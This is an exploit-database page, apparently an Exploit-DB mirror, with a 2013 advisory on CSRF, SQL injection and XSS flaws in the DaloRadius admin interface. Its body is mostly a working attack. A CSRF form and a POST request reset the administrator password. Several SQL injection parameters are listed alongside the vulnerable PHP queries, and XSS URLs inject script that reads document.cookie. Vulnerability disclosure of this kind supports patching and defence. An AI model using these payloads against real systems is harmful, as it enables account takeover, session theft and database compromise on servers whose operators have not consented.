header-logo
Suggest Exploit
vendor:
DaloRadius
by:
Saadat Ullah
8,8
CVSS
HIGH
SQL Injection, Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS)
352, 89, 79
CWE
Product Name: DaloRadius
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

DaloRadius SQLi / CSRF / XSS

DaloRadius is vulnerable to Cross-Site Request Forgery (CSRF) on all locations, including the Change Admin Password page. An attacker can craft a malicious request to change the administrator password without any security tokens. Additionally, DaloRadius is vulnerable to multiple SQL Injection and XSS vulnerabilities on the acct-ipaddress.php, acct-date.php, and other pages.

Mitigation:

Implement security tokens to protect against CSRF, and validate user input to prevent SQL Injection and XSS.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------
# Software      : DaloRadius    SQLi / CSRF / XSS                                                                                                            
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home	: http://security-geeks.blogspot.com
# Date          : 15/3/13   
# Vendors	: http://www.daloradius.com/ 
# Download Link : http://sourceforge.net/projects/daloradius/   
                                                                                     
-------------------------------------------------------------------------
+---+[ CSRF Change Admin Password ]+---+

DaloRadius Is not Using Any Security Tokens To Protect Againts CRSF.It is vuln to CRSF on All Locations.
Some OF them..
Change Admin Password

<form action="daloradius/config-operators-edit.php" method="post">
				<input type="hidden" value="administrator" name="operator_username" />

<div class="tabber">

     <div class="tabbertab" title="Operator Info">

	<fieldset>
	
		<h302></h302>
		<br/>

                <label for='operator_password' class='form'></label>
                <input name='password' id='password'
		type='hidden'			value='radius1' tabindex=101 />
                <br/>

                <br/><br/>
                <hr><br/>

                <input type='submit' name='submit' value='Apply' class='button' />

Poc
Header
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/daloradius/config-operators-edit.php?operator_username=administrator
Cookie: PHPSESSID=5f528764d624db129645be2e9
Content-Type: application/x-www-form-urlencoded
Content-Length: 3540

Post Data:
operator_username=administrator&password=radius1&submit=Apply

+---+[ SQL Injection ]+---+

Their are multiple SQLI in the script some are..
http://localhost/daloradius/acct-ipaddress.php?orderBy=[SQLi]
http://localhost/daloradius/acct-ipaddress.php?ipaddress=[SQLi]
http://localhost/daloradius/acct-date.php?orderBy=[SQLi]
http://localhost/daloradius/acct-date.php?username=[SQLi] etc

Proof Of Concept
in acct-ipaddress.php

isset($_GET['orderBy']) ? $orderBy = $_GET['orderBy'] : $orderBy = "radacctid";
	isset($_GET['orderType']) ? $orderType = $_GET['orderType'] : $orderType = "asc";	


	isset($_GET['ipaddress']) ? $ipaddress = $_GET['ipaddress'] : $ipaddress = "";

	.
	.
	.
 $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, radacct.FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, radacct.AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE FramedIPAddress='$ipaddress';";


In acct-date.php
if ( (isset($_GET['username'])) && ($_GET['username']) ) {
		$username = $_GET['username'];



  $sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, ".$configValues['CONFIG_DB_TBL_RADACCT'].".FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE AcctStartTime>'$startdate' and AcctStartTime<'$enddate' and UserName like '$username';";



+---+[ XSS ]+---+
http://localhost/daloradius/rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter=<script>alert(document.cookie);</script>
http://localhost/daloradius/mng-search.php?username=<script>alert(document.cookie);</script>

#Independent Pakistani Security Researcher

Navigation

Suggest Exploit

Services By CQR